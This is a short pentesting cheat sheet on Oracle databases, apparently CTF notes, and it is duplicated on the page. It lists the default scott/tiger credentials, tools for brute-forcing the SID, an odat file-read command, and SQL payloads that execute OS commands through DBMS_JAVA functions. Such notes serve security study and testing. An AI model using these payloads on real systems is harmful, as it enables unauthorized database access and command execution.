ORACLE

Oracle / ODAT

Basic Credentials

Username --> Scott 
Password --> tiger

Brute-force SID

HELP

Use: odat and its sidguesser to bruteforce with a link provided
Use metasploit and use auxiliary(admin/oracle/sid_brute)

Use sqlplus to login with the creds or

Read file with odat:

odat ctxsys -s <ip> -d XE -U SCOTT -P tiger --sysdba --getFile flag.txt

Command Execution

-- 10g R2, 11g R1 and R2: DBMS_JAVA_TEST.FUNCALL()
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c', 'dir >c:\test.txt') FROM DUAL
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','/bin/ls>/tmp/OUT2.LST') from dual

-- 11g R1 and R2: DBMS_JAVA.RUNJAVA()
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL

References

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md

PreviousMSSQL NextREDIS

Last updated 4 months ago

ORACLE

Oracle / ODAT

Basic Credentials

Username --> Scott 
Password --> tiger

Brute-force SID

HELP

Use: odat and its sidguesser to bruteforce with a link provided
Use metasploit and use auxiliary(admin/oracle/sid_brute)

Use sqlplus to login with the creds or

Read file with odat:

odat ctxsys -s <ip> -d XE -U SCOTT -P tiger --sysdba --getFile flag.txt

Command Execution

-- 10g R2, 11g R1 and R2: DBMS_JAVA_TEST.FUNCALL()
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c', 'dir >c:\test.txt') FROM DUAL
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','/bin/ls>/tmp/OUT2.LST') from dual

-- 11g R1 and R2: DBMS_JAVA.RUNJAVA()
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL

References

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md

PreviousMSSQL NextREDIS

Last updated 4 months ago